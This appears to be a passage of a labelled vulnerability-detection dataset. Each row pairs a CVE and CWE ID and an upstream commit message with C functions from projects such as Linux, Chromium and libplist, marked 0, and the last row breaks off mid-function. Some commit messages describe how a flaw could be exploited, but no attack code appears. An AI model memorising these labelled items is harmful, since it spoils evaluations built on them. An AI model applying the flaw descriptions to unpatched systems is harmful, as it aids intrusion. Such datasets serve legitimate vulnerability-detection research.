|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/30b0f37300f8d671d29d91102ec7f475ed4cf7fe
|
30b0f37300f8d671d29d91102ec7f475ed4cf7fe
|
Use invalidation sets for :read-only and :read-write.
Gets rid of SubtreeStyleChange which relies on sibling tree recalcs.
R=tkent@chromium.org,ericwilligers@chromium.org
BUG=557440
Review URL: https://codereview.chromium.org/1454003002
Cr-Commit-Position: refs/heads/master@{#360298}
|
bool HTMLFormControlElement::isValidationMessageVisible() const
{
if (!m_hasValidationMessage)
return false;
ValidationMessageClient* client = validationMessageClient();
if (!client)
return false;
return client->isValidationMessageVisible(*this);
}
|
bool HTMLFormControlElement::isValidationMessageVisible() const
{
if (!m_hasValidationMessage)
return false;
ValidationMessageClient* client = validationMessageClient();
if (!client)
return false;
return client->isValidationMessageVisible(*this);
}
|
C
|
Chrome
| 0 |
CVE-2013-1957
|
https://www.cvedetails.com/cve/CVE-2013-1957/
|
CWE-264
|
https://github.com/torvalds/linux/commit/132c94e31b8bca8ea921f9f96a57d684fa4ae0a9
|
132c94e31b8bca8ea921f9f96a57d684fa4ae0a9
|
vfs: Carefully propogate mounts across user namespaces
As a matter of policy MNT_READONLY should not be changable if the
original mounter had more privileges than creator of the mount
namespace.
Add the flag CL_UNPRIVILEGED to note when we are copying a mount from
a mount namespace that requires more privileges to a mount namespace
that requires fewer privileges.
When the CL_UNPRIVILEGED flag is set cause clone_mnt to set MNT_NO_REMOUNT
if any of the mnt flags that should never be changed are set.
This protects both mount propagation and the initial creation of a less
privileged mount namespace.
Cc: stable@vger.kernel.org
Acked-by: Serge Hallyn <serge.hallyn@canonical.com>
Reported-by: Andy Lutomirski <luto@amacapital.net>
Signed-off-by: "Eric W. Biederman" <ebiederm@xmission.com>
|
SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
char __user *, type, unsigned long, flags, void __user *, data)
{
int ret;
char *kernel_type;
struct filename *kernel_dir;
char *kernel_dev;
unsigned long data_page;
ret = copy_mount_string(type, &kernel_type);
if (ret < 0)
goto out_type;
kernel_dir = getname(dir_name);
if (IS_ERR(kernel_dir)) {
ret = PTR_ERR(kernel_dir);
goto out_dir;
}
ret = copy_mount_string(dev_name, &kernel_dev);
if (ret < 0)
goto out_dev;
ret = copy_mount_options(data, &data_page);
if (ret < 0)
goto out_data;
ret = do_mount(kernel_dev, kernel_dir->name, kernel_type, flags,
(void *) data_page);
free_page(data_page);
out_data:
kfree(kernel_dev);
out_dev:
putname(kernel_dir);
out_dir:
kfree(kernel_type);
out_type:
return ret;
}
|
SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
char __user *, type, unsigned long, flags, void __user *, data)
{
int ret;
char *kernel_type;
struct filename *kernel_dir;
char *kernel_dev;
unsigned long data_page;
ret = copy_mount_string(type, &kernel_type);
if (ret < 0)
goto out_type;
kernel_dir = getname(dir_name);
if (IS_ERR(kernel_dir)) {
ret = PTR_ERR(kernel_dir);
goto out_dir;
}
ret = copy_mount_string(dev_name, &kernel_dev);
if (ret < 0)
goto out_dev;
ret = copy_mount_options(data, &data_page);
if (ret < 0)
goto out_data;
ret = do_mount(kernel_dev, kernel_dir->name, kernel_type, flags,
(void *) data_page);
free_page(data_page);
out_data:
kfree(kernel_dev);
out_dev:
putname(kernel_dir);
out_dir:
kfree(kernel_type);
out_type:
return ret;
}
|
C
|
linux
| 0 |
CVE-2018-6143
|
https://www.cvedetails.com/cve/CVE-2018-6143/
|
CWE-125
|
https://github.com/chromium/chromium/commit/1f35b6980f600ec93e167118c21959d5cbd7c5c4
|
1f35b6980f600ec93e167118c21959d5cbd7c5c4
|
Fix Credential Management API Store() for existing Credentials
This changes fixes the Credential Management API to correctly handle
storing of already existing credentials. In the previous version
`preferred_match()` was updated, which is not necessarily the credential
selected by the user.
Bug: 795878
Cq-Include-Trybots: master.tryserver.chromium.linux:linux_mojo
Change-Id: I269f465861f44cdd784f0ce077e755191d3bd7bd
Reviewed-on: https://chromium-review.googlesource.com/843022
Commit-Queue: Jan Wilken Dörrie <jdoerrie@chromium.org>
Reviewed-by: Balazs Engedy <engedy@chromium.org>
Reviewed-by: Jochen Eisinger <jochen@chromium.org>
Reviewed-by: Maxim Kolosovskiy <kolos@chromium.org>
Cr-Commit-Position: refs/heads/master@{#526313}
|
void CredentialManagerImpl::Store(const CredentialInfo& credential,
StoreCallback callback) {
DCHECK_NE(CredentialType::CREDENTIAL_TYPE_EMPTY, credential.type);
if (password_manager_util::IsLoggingActive(client_)) {
CredentialManagerLogger(client_->GetLogManager())
.LogStoreCredential(GetLastCommittedURL(), credential.type);
}
std::move(callback).Run();
if (!client_->IsSavingAndFillingEnabledForCurrentPage() ||
!client_->OnCredentialManagerUsed())
return;
client_->NotifyStorePasswordCalled();
GURL origin = GetLastCommittedURL().GetOrigin();
std::unique_ptr<autofill::PasswordForm> form(
CreatePasswordFormFromCredentialInfo(credential, origin));
std::unique_ptr<autofill::PasswordForm> observed_form =
CreateObservedPasswordFormFromOrigin(origin);
auto form_fetcher = std::make_unique<FormFetcherImpl>(
PasswordStore::FormDigest(*observed_form), client_, false, false);
form_manager_ = std::make_unique<CredentialManagerPasswordFormManager>(
client_, *observed_form, std::move(form), this, nullptr,
std::move(form_fetcher));
form_manager_->Init(nullptr);
}
|
void CredentialManagerImpl::Store(const CredentialInfo& credential,
StoreCallback callback) {
DCHECK_NE(CredentialType::CREDENTIAL_TYPE_EMPTY, credential.type);
if (password_manager_util::IsLoggingActive(client_)) {
CredentialManagerLogger(client_->GetLogManager())
.LogStoreCredential(GetLastCommittedURL(), credential.type);
}
std::move(callback).Run();
if (!client_->IsSavingAndFillingEnabledForCurrentPage() ||
!client_->OnCredentialManagerUsed())
return;
client_->NotifyStorePasswordCalled();
GURL origin = GetLastCommittedURL().GetOrigin();
std::unique_ptr<autofill::PasswordForm> form(
CreatePasswordFormFromCredentialInfo(credential, origin));
std::unique_ptr<autofill::PasswordForm> observed_form =
CreateObservedPasswordFormFromOrigin(origin);
auto form_fetcher = std::make_unique<FormFetcherImpl>(
PasswordStore::FormDigest(*observed_form), client_, false, false);
form_manager_ = std::make_unique<CredentialManagerPasswordFormManager>(
client_, *observed_form, std::move(form), this, nullptr,
std::move(form_fetcher));
form_manager_->Init(nullptr);
}
|
C
|
Chrome
| 0 |
CVE-2018-20855
|
https://www.cvedetails.com/cve/CVE-2018-20855/
|
CWE-119
|
https://github.com/torvalds/linux/commit/0625b4ba1a5d4703c7fb01c497bd6c156908af00
|
0625b4ba1a5d4703c7fb01c497bd6c156908af00
|
IB/mlx5: Fix leaking stack memory to userspace
mlx5_ib_create_qp_resp was never initialized and only the first 4 bytes
were written.
Fixes: 41d902cb7c32 ("RDMA/mlx5: Fix definition of mlx5_ib_create_qp_resp")
Cc: <stable@vger.kernel.org>
Acked-by: Leon Romanovsky <leonro@mellanox.com>
Signed-off-by: Jason Gunthorpe <jgg@mellanox.com>
|
static void destroy_raw_packet_qp_rq(struct mlx5_ib_dev *dev,
struct mlx5_ib_rq *rq)
{
mlx5_core_destroy_rq_tracked(dev->mdev, &rq->base.mqp);
}
|
static void destroy_raw_packet_qp_rq(struct mlx5_ib_dev *dev,
struct mlx5_ib_rq *rq)
{
mlx5_core_destroy_rq_tracked(dev->mdev, &rq->base.mqp);
}
|
C
|
linux
| 0 |
CVE-2019-12818
|
https://www.cvedetails.com/cve/CVE-2019-12818/
|
CWE-476
|
https://github.com/torvalds/linux/commit/58bdd544e2933a21a51eecf17c3f5f94038261b5
|
58bdd544e2933a21a51eecf17c3f5f94038261b5
|
net: nfc: Fix NULL dereference on nfc_llcp_build_tlv fails
KASAN report this:
BUG: KASAN: null-ptr-deref in nfc_llcp_build_gb+0x37f/0x540 [nfc]
Read of size 3 at addr 0000000000000000 by task syz-executor.0/5401
CPU: 0 PID: 5401 Comm: syz-executor.0 Not tainted 5.0.0-rc7+ #45
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
Call Trace:
__dump_stack lib/dump_stack.c:77 [inline]
dump_stack+0xfa/0x1ce lib/dump_stack.c:113
kasan_report+0x171/0x18d mm/kasan/report.c:321
memcpy+0x1f/0x50 mm/kasan/common.c:130
nfc_llcp_build_gb+0x37f/0x540 [nfc]
nfc_llcp_register_device+0x6eb/0xb50 [nfc]
nfc_register_device+0x50/0x1d0 [nfc]
nfcsim_device_new+0x394/0x67d [nfcsim]
? 0xffffffffc1080000
nfcsim_init+0x6b/0x1000 [nfcsim]
do_one_initcall+0xfa/0x5ca init/main.c:887
do_init_module+0x204/0x5f6 kernel/module.c:3460
load_module+0x66b2/0x8570 kernel/module.c:3808
__do_sys_finit_module+0x238/0x2a0 kernel/module.c:3902
do_syscall_64+0x147/0x600 arch/x86/entry/common.c:290
entry_SYSCALL_64_after_hwframe+0x49/0xbe
RIP: 0033:0x462e99
Code: f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 bc ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f9cb79dcc58 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
RAX: ffffffffffffffda RBX: 000000000073bf00 RCX: 0000000000462e99
RDX: 0000000000000000 RSI: 0000000020000280 RDI: 0000000000000003
RBP: 00007f9cb79dcc70 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007f9cb79dd6bc
R13: 00000000004bcefb R14: 00000000006f7030 R15: 0000000000000004
nfc_llcp_build_tlv will return NULL on fails, caller should check it,
otherwise will trigger a NULL dereference.
Reported-by: Hulk Robot <hulkci@huawei.com>
Fixes: eda21f16a5ed ("NFC: Set MIU and RW values from CONNECT and CC LLCP frames")
Fixes: d646960f7986 ("NFC: Initial LLCP support")
Signed-off-by: YueHaibing <yuehaibing@huawei.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
int err)
{
struct sock *sk;
struct hlist_node *tmp;
struct nfc_llcp_sock *llcp_sock;
skb_queue_purge(&local->tx_queue);
write_lock(&local->sockets.lock);
sk_for_each_safe(sk, tmp, &local->sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (sk->sk_state == LLCP_CONNECTED)
nfc_put_device(llcp_sock->dev);
if (sk->sk_state == LLCP_LISTEN) {
struct nfc_llcp_sock *lsk, *n;
struct sock *accept_sk;
list_for_each_entry_safe(lsk, n,
&llcp_sock->accept_queue,
accept_queue) {
accept_sk = &lsk->sk;
bh_lock_sock(accept_sk);
nfc_llcp_accept_unlink(accept_sk);
if (err)
accept_sk->sk_err = err;
accept_sk->sk_state = LLCP_CLOSED;
accept_sk->sk_state_change(sk);
bh_unlock_sock(accept_sk);
}
}
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->sockets.lock);
/* If we still have a device, we keep the RAW sockets alive */
if (device == true)
return;
write_lock(&local->raw_sockets.lock);
sk_for_each_safe(sk, tmp, &local->raw_sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->raw_sockets.lock);
}
|
static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
int err)
{
struct sock *sk;
struct hlist_node *tmp;
struct nfc_llcp_sock *llcp_sock;
skb_queue_purge(&local->tx_queue);
write_lock(&local->sockets.lock);
sk_for_each_safe(sk, tmp, &local->sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (sk->sk_state == LLCP_CONNECTED)
nfc_put_device(llcp_sock->dev);
if (sk->sk_state == LLCP_LISTEN) {
struct nfc_llcp_sock *lsk, *n;
struct sock *accept_sk;
list_for_each_entry_safe(lsk, n,
&llcp_sock->accept_queue,
accept_queue) {
accept_sk = &lsk->sk;
bh_lock_sock(accept_sk);
nfc_llcp_accept_unlink(accept_sk);
if (err)
accept_sk->sk_err = err;
accept_sk->sk_state = LLCP_CLOSED;
accept_sk->sk_state_change(sk);
bh_unlock_sock(accept_sk);
}
}
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->sockets.lock);
/* If we still have a device, we keep the RAW sockets alive */
if (device == true)
return;
write_lock(&local->raw_sockets.lock);
sk_for_each_safe(sk, tmp, &local->raw_sockets.head) {
llcp_sock = nfc_llcp_sock(sk);
bh_lock_sock(sk);
nfc_llcp_socket_purge(llcp_sock);
if (err)
sk->sk_err = err;
sk->sk_state = LLCP_CLOSED;
sk->sk_state_change(sk);
bh_unlock_sock(sk);
sk_del_node_init(sk);
}
write_unlock(&local->raw_sockets.lock);
}
|
C
|
linux
| 0 |
CVE-2017-5011
|
https://www.cvedetails.com/cve/CVE-2017-5011/
|
CWE-200
|
https://github.com/chromium/chromium/commit/eea3300239f0b53e172a320eb8de59d0bea65f27
|
eea3300239f0b53e172a320eb8de59d0bea65f27
|
DevTools: move front-end URL handling to DevToolsUIBindingds
BUG=662859
Review-Url: https://codereview.chromium.org/2607833002
Cr-Commit-Position: refs/heads/master@{#440926}
|
ResponseWriter::ResponseWriter(base::WeakPtr<DevToolsUIBindings> bindings,
int stream_id)
: bindings_(bindings),
stream_id_(stream_id) {
}
|
ResponseWriter::ResponseWriter(base::WeakPtr<DevToolsUIBindings> bindings,
int stream_id)
: bindings_(bindings),
stream_id_(stream_id) {
}
|
C
|
Chrome
| 0 |
CVE-2015-1295
|
https://www.cvedetails.com/cve/CVE-2015-1295/
| null |
https://github.com/chromium/chromium/commit/8fa5a358cb32085b51daf92df8fd4a79b3931f81
|
8fa5a358cb32085b51daf92df8fd4a79b3931f81
|
Crash on nested IPC handlers in PrintWebViewHelper
Class is not designed to handle nested IPC. Regular flows also does not
expect them. Still during printing of plugging them may show message
boxes and start nested message loops.
For now we are going just crash. If stats show us that this case is
frequent we will have to do something more complicated.
BUG=502562
Review URL: https://codereview.chromium.org/1228693002
Cr-Commit-Position: refs/heads/master@{#338100}
|
blink::WebLocalFrame* FrameReference::GetFrame() {
if (view_ == NULL || frame_ == NULL)
return NULL;
for (blink::WebFrame* frame = view_->mainFrame(); frame != NULL;
frame = frame->traverseNext(false)) {
if (frame == frame_)
return frame_;
}
return NULL;
}
|
blink::WebLocalFrame* FrameReference::GetFrame() {
if (view_ == NULL || frame_ == NULL)
return NULL;
for (blink::WebFrame* frame = view_->mainFrame(); frame != NULL;
frame = frame->traverseNext(false)) {
if (frame == frame_)
return frame_;
}
return NULL;
}
|
C
|
Chrome
| 0 |
CVE-2018-13006
|
https://www.cvedetails.com/cve/CVE-2018-13006/
|
CWE-125
|
https://github.com/gpac/gpac/commit/bceb03fd2be95097a7b409ea59914f332fb6bc86
|
bceb03fd2be95097a7b409ea59914f332fb6bc86
|
fixed 2 possible heap overflows (inc. #1088)
|
GF_Err tssy_Read(GF_Box *s, GF_BitStream *bs)
{
GF_TimeStampSynchronyBox *ptr = (GF_TimeStampSynchronyBox *)s;
gf_bs_read_int(bs, 6);
ptr->timestamp_sync = gf_bs_read_int(bs, 2);
return GF_OK;
}
|
GF_Err tssy_Read(GF_Box *s, GF_BitStream *bs)
{
GF_TimeStampSynchronyBox *ptr = (GF_TimeStampSynchronyBox *)s;
gf_bs_read_int(bs, 6);
ptr->timestamp_sync = gf_bs_read_int(bs, 2);
return GF_OK;
}
|
C
|
gpac
| 0 |
CVE-2015-1573
|
https://www.cvedetails.com/cve/CVE-2015-1573/
|
CWE-19
|
https://github.com/torvalds/linux/commit/a2f18db0c68fec96631c10cad9384c196e9008ac
|
a2f18db0c68fec96631c10cad9384c196e9008ac
|
netfilter: nf_tables: fix flush ruleset chain dependencies
Jumping between chains doesn't mix well with flush ruleset. Rules
from a different chain and set elements may still refer to us.
[ 353.373791] ------------[ cut here ]------------
[ 353.373845] kernel BUG at net/netfilter/nf_tables_api.c:1159!
[ 353.373896] invalid opcode: 0000 [#1] SMP
[ 353.373942] Modules linked in: intel_powerclamp uas iwldvm iwlwifi
[ 353.374017] CPU: 0 PID: 6445 Comm: 31c3.nft Not tainted 3.18.0 #98
[ 353.374069] Hardware name: LENOVO 5129CTO/5129CTO, BIOS 6QET47WW (1.17 ) 07/14/2010
[...]
[ 353.375018] Call Trace:
[ 353.375046] [<ffffffff81964c31>] ? nf_tables_commit+0x381/0x540
[ 353.375101] [<ffffffff81949118>] nfnetlink_rcv+0x3d8/0x4b0
[ 353.375150] [<ffffffff81943fc5>] netlink_unicast+0x105/0x1a0
[ 353.375200] [<ffffffff8194438e>] netlink_sendmsg+0x32e/0x790
[ 353.375253] [<ffffffff818f398e>] sock_sendmsg+0x8e/0xc0
[ 353.375300] [<ffffffff818f36b9>] ? move_addr_to_kernel.part.20+0x19/0x70
[ 353.375357] [<ffffffff818f44f9>] ? move_addr_to_kernel+0x19/0x30
[ 353.375410] [<ffffffff819016d2>] ? verify_iovec+0x42/0xd0
[ 353.375459] [<ffffffff818f3e10>] ___sys_sendmsg+0x3f0/0x400
[ 353.375510] [<ffffffff810615fa>] ? native_sched_clock+0x2a/0x90
[ 353.375563] [<ffffffff81176697>] ? acct_account_cputime+0x17/0x20
[ 353.375616] [<ffffffff8110dc78>] ? account_user_time+0x88/0xa0
[ 353.375667] [<ffffffff818f4bbd>] __sys_sendmsg+0x3d/0x80
[ 353.375719] [<ffffffff81b184f4>] ? int_check_syscall_exit_work+0x34/0x3d
[ 353.375776] [<ffffffff818f4c0d>] SyS_sendmsg+0xd/0x20
[ 353.375823] [<ffffffff81b1826d>] system_call_fastpath+0x16/0x1b
Release objects in this order: rules -> sets -> chains -> tables, to
make sure no references to chains are held anymore.
Reported-by: Asbjoern Sloth Toennesen <asbjorn@asbjorn.biz>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
|
static int __init nf_tables_module_init(void)
{
int err;
info = kmalloc(sizeof(struct nft_expr_info) * NFT_RULE_MAXEXPRS,
GFP_KERNEL);
if (info == NULL) {
err = -ENOMEM;
goto err1;
}
err = nf_tables_core_module_init();
if (err < 0)
goto err2;
err = nfnetlink_subsys_register(&nf_tables_subsys);
if (err < 0)
goto err3;
pr_info("nf_tables: (c) 2007-2009 Patrick McHardy <kaber@trash.net>\n");
return register_pernet_subsys(&nf_tables_net_ops);
err3:
nf_tables_core_module_exit();
err2:
kfree(info);
err1:
return err;
}
|
static int __init nf_tables_module_init(void)
{
int err;
info = kmalloc(sizeof(struct nft_expr_info) * NFT_RULE_MAXEXPRS,
GFP_KERNEL);
if (info == NULL) {
err = -ENOMEM;
goto err1;
}
err = nf_tables_core_module_init();
if (err < 0)
goto err2;
err = nfnetlink_subsys_register(&nf_tables_subsys);
if (err < 0)
goto err3;
pr_info("nf_tables: (c) 2007-2009 Patrick McHardy <kaber@trash.net>\n");
return register_pernet_subsys(&nf_tables_net_ops);
err3:
nf_tables_core_module_exit();
err2:
kfree(info);
err1:
return err;
}
|
C
|
linux
| 0 |
CVE-2019-6974
|
https://www.cvedetails.com/cve/CVE-2019-6974/
|
CWE-362
|
https://github.com/torvalds/linux/commit/cfa39381173d5f969daf43582c95ad679189cbc9
|
cfa39381173d5f969daf43582c95ad679189cbc9
|
kvm: fix kvm_ioctl_create_device() reference counting (CVE-2019-6974)
kvm_ioctl_create_device() does the following:
1. creates a device that holds a reference to the VM object (with a borrowed
reference, the VM's refcount has not been bumped yet)
2. initializes the device
3. transfers the reference to the device to the caller's file descriptor table
4. calls kvm_get_kvm() to turn the borrowed reference to the VM into a real
reference
The ownership transfer in step 3 must not happen before the reference to the VM
becomes a proper, non-borrowed reference, which only happens in step 4.
After step 3, an attacker can close the file descriptor and drop the borrowed
reference, which can cause the refcount of the kvm object to drop to zero.
This means that we need to grab a reference for the device before
anon_inode_getfd(), otherwise the VM can disappear from under us.
Fixes: 852b6d57dc7f ("kvm: add device control API")
Cc: stable@kernel.org
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
|
static int vcpu_stat_get_per_vm_open(struct inode *inode, struct file *file)
{
__simple_attr_check_format("%llu\n", 0ull);
return kvm_debugfs_open(inode, file, vcpu_stat_get_per_vm,
vcpu_stat_clear_per_vm, "%llu\n");
}
|
static int vcpu_stat_get_per_vm_open(struct inode *inode, struct file *file)
{
__simple_attr_check_format("%llu\n", 0ull);
return kvm_debugfs_open(inode, file, vcpu_stat_get_per_vm,
vcpu_stat_clear_per_vm, "%llu\n");
}
|
C
|
linux
| 0 |
CVE-2018-20071
|
https://www.cvedetails.com/cve/CVE-2018-20071/
| null |
https://github.com/chromium/chromium/commit/562da5192ff110199fe290bdb7ea76d8118071fd
|
562da5192ff110199fe290bdb7ea76d8118071fd
|
[Payments] Restrict just-in-time payment handler to payment method domain and its subdomains
Bug: 853937
Change-Id: I148b3d96950a9d90fa362e580e9593caa6b92a36
Reviewed-on: https://chromium-review.googlesource.com/1132116
Reviewed-by: Mathieu Perreault <mathp@chromium.org>
Commit-Queue: Ganggui Tang <gogerald@chromium.org>
Cr-Commit-Position: refs/heads/master@{#573911}
|
void InstallablePaymentAppCrawler::WarnIfPossible(const std::string& message) {
if (web_contents()) {
web_contents()->GetMainFrame()->AddMessageToConsole(
content::ConsoleMessageLevel::CONSOLE_MESSAGE_LEVEL_WARNING, message);
} else {
LOG(WARNING) << message;
}
}
|
void InstallablePaymentAppCrawler::WarnIfPossible(const std::string& message) {
if (web_contents()) {
web_contents()->GetMainFrame()->AddMessageToConsole(
content::ConsoleMessageLevel::CONSOLE_MESSAGE_LEVEL_WARNING, message);
} else {
LOG(WARNING) << message;
}
}
|
C
|
Chrome
| 0 |
CVE-2016-3751
|
https://www.cvedetails.com/cve/CVE-2016-3751/
| null |
https://android.googlesource.com/platform/external/libpng/+/9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
9d4853418ab2f754c2b63e091c29c5529b8b86ca
|
DO NOT MERGE Update libpng to 1.6.20
BUG:23265085
Change-Id: I85199805636d771f3597b691b63bc0bf46084833
(cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82)
|
checkbuffer(Image *image, const char *arg)
{
if (check16(image->buffer, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at start of image buffer\n", arg);
exit(1);
}
if (check16(image->buffer+16+image->allocsize, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at end of image buffer\n", arg);
exit(1);
}
}
|
checkbuffer(Image *image, const char *arg)
{
if (check16(image->buffer, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at start of image buffer\n", arg);
exit(1);
}
if (check16(image->buffer+16+image->allocsize, 95))
{
fflush(stdout);
fprintf(stderr, "%s: overwrite at end of image buffer\n", arg);
exit(1);
}
}
|
C
|
Android
| 0 |
CVE-2011-1800
|
https://www.cvedetails.com/cve/CVE-2011-1800/
|
CWE-189
|
https://github.com/chromium/chromium/commit/1777aa6484af15014b8691082a8c3075418786f5
|
1777aa6484af15014b8691082a8c3075418786f5
|
[Qt][WK2] Allow transparent WebViews
https://bugs.webkit.org/show_bug.cgi?id=80608
Reviewed by Tor Arne Vestbø.
Added support for transparentBackground in QQuickWebViewExperimental.
This uses the existing drawsTransparentBackground property in WebKit2.
Also, changed LayerTreeHostQt to set the contentsOpaque flag when the root layer changes,
otherwise the change doesn't take effect.
A new API test was added.
* UIProcess/API/qt/qquickwebview.cpp:
(QQuickWebViewPrivate::setTransparentBackground):
(QQuickWebViewPrivate::transparentBackground):
(QQuickWebViewExperimental::transparentBackground):
(QQuickWebViewExperimental::setTransparentBackground):
* UIProcess/API/qt/qquickwebview_p.h:
* UIProcess/API/qt/qquickwebview_p_p.h:
(QQuickWebViewPrivate):
* UIProcess/API/qt/tests/qquickwebview/tst_qquickwebview.cpp:
(tst_QQuickWebView):
(tst_QQuickWebView::transparentWebViews):
* WebProcess/WebPage/qt/LayerTreeHostQt.cpp:
(WebKit::LayerTreeHostQt::LayerTreeHostQt):
(WebKit::LayerTreeHostQt::setRootCompositingLayer):
git-svn-id: svn://svn.chromium.org/blink/trunk@110254 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
QDeclarativeComponent* QQuickWebViewExperimental::authenticationDialog() const
{
Q_D(const QQuickWebView);
return d->authenticationDialog;
}
|
QDeclarativeComponent* QQuickWebViewExperimental::authenticationDialog() const
{
Q_D(const QQuickWebView);
return d->authenticationDialog;
}
|
C
|
Chrome
| 0 |
CVE-2017-6435
|
https://www.cvedetails.com/cve/CVE-2017-6435/
|
CWE-119
|
https://github.com/libimobiledevice/libplist/commit/fbd8494d5e4e46bf2e90cb6116903e404374fb56
|
fbd8494d5e4e46bf2e90cb6116903e404374fb56
|
bplist: Make sure to bail out if malloc() fails in parse_string_node()
Credit to Wang Junjie <zhunkibatu@gmail.com> (#93)
|
static uint16_t *plist_utf8_to_utf16(char *unistr, long size, long *items_read, long *items_written)
{
uint16_t *outbuf = (uint16_t*)malloc(((size*2)+1)*sizeof(uint16_t));
int p = 0;
long i = 0;
unsigned char c0;
unsigned char c1;
unsigned char c2;
unsigned char c3;
uint32_t w;
while (i < size) {
c0 = unistr[i];
c1 = (i < size-1) ? unistr[i+1] : 0;
c2 = (i < size-2) ? unistr[i+2] : 0;
c3 = (i < size-3) ? unistr[i+3] : 0;
if ((c0 >= 0xF0) && (i < size-3) && (c1 >= 0x80) && (c2 >= 0x80) && (c3 >= 0x80)) {
w = ((((c0 & 7) << 18) + ((c1 & 0x3F) << 12) + ((c2 & 0x3F) << 6) + (c3 & 0x3F)) & 0x1FFFFF) - 0x010000;
outbuf[p++] = 0xD800 + (w >> 10);
outbuf[p++] = 0xDC00 + (w & 0x3FF);
i+=4;
} else if ((c0 >= 0xE0) && (i < size-2) && (c1 >= 0x80) && (c2 >= 0x80)) {
outbuf[p++] = ((c2 & 0x3F) + ((c1 & 3) << 6)) + (((c1 >> 2) & 15) << 8) + ((c0 & 15) << 12);
i+=3;
} else if ((c0 >= 0xC0) && (i < size-1) && (c1 >= 0x80)) {
outbuf[p++] = ((c1 & 0x3F) + ((c0 & 3) << 6)) + (((c0 >> 2) & 7) << 8);
i+=2;
} else if (c0 < 0x80) {
outbuf[p++] = c0;
i+=1;
} else {
PLIST_BIN_ERR("%s: invalid utf8 sequence in string at index %lu\n", __func__, i);
break;
}
}
if (items_read) {
*items_read = i;
}
if (items_written) {
*items_written = p;
}
outbuf[p] = 0;
return outbuf;
}
|
static uint16_t *plist_utf8_to_utf16(char *unistr, long size, long *items_read, long *items_written)
{
uint16_t *outbuf = (uint16_t*)malloc(((size*2)+1)*sizeof(uint16_t));
int p = 0;
long i = 0;
unsigned char c0;
unsigned char c1;
unsigned char c2;
unsigned char c3;
uint32_t w;
while (i < size) {
c0 = unistr[i];
c1 = (i < size-1) ? unistr[i+1] : 0;
c2 = (i < size-2) ? unistr[i+2] : 0;
c3 = (i < size-3) ? unistr[i+3] : 0;
if ((c0 >= 0xF0) && (i < size-3) && (c1 >= 0x80) && (c2 >= 0x80) && (c3 >= 0x80)) {
w = ((((c0 & 7) << 18) + ((c1 & 0x3F) << 12) + ((c2 & 0x3F) << 6) + (c3 & 0x3F)) & 0x1FFFFF) - 0x010000;
outbuf[p++] = 0xD800 + (w >> 10);
outbuf[p++] = 0xDC00 + (w & 0x3FF);
i+=4;
} else if ((c0 >= 0xE0) && (i < size-2) && (c1 >= 0x80) && (c2 >= 0x80)) {
outbuf[p++] = ((c2 & 0x3F) + ((c1 & 3) << 6)) + (((c1 >> 2) & 15) << 8) + ((c0 & 15) << 12);
i+=3;
} else if ((c0 >= 0xC0) && (i < size-1) && (c1 >= 0x80)) {
outbuf[p++] = ((c1 & 0x3F) + ((c0 & 3) << 6)) + (((c0 >> 2) & 7) << 8);
i+=2;
} else if (c0 < 0x80) {
outbuf[p++] = c0;
i+=1;
} else {
PLIST_BIN_ERR("%s: invalid utf8 sequence in string at index %lu\n", __func__, i);
break;
}
}
if (items_read) {
*items_read = i;
}
if (items_written) {
*items_written = p;
}
outbuf[p] = 0;
return outbuf;
}
|
C
|
libplist
| 0 |
CVE-2016-5688
|
https://www.cvedetails.com/cve/CVE-2016-5688/
|
CWE-119
|
https://github.com/ImageMagick/ImageMagick/commit/aecd0ada163a4d6c769cec178955d5f3e9316f2f
|
aecd0ada163a4d6c769cec178955d5f3e9316f2f
|
Set pixel cache to undefined if any resource limit is exceeded
|
static MagickBooleanType ClonePixelCacheRepository(
CacheInfo *magick_restrict clone_info,CacheInfo *magick_restrict cache_info,
ExceptionInfo *exception)
{
#define MaxCacheThreads 2
#define cache_threads(source,destination) \
num_threads(((source)->type == DiskCache) || \
((destination)->type == DiskCache) || (((source)->rows) < \
(16*GetMagickResourceLimit(ThreadResource))) ? 1 : \
GetMagickResourceLimit(ThreadResource) < MaxCacheThreads ? \
GetMagickResourceLimit(ThreadResource) : MaxCacheThreads)
MagickBooleanType
optimize,
status;
NexusInfo
**magick_restrict cache_nexus,
**magick_restrict clone_nexus;
size_t
length;
ssize_t
y;
assert(cache_info != (CacheInfo *) NULL);
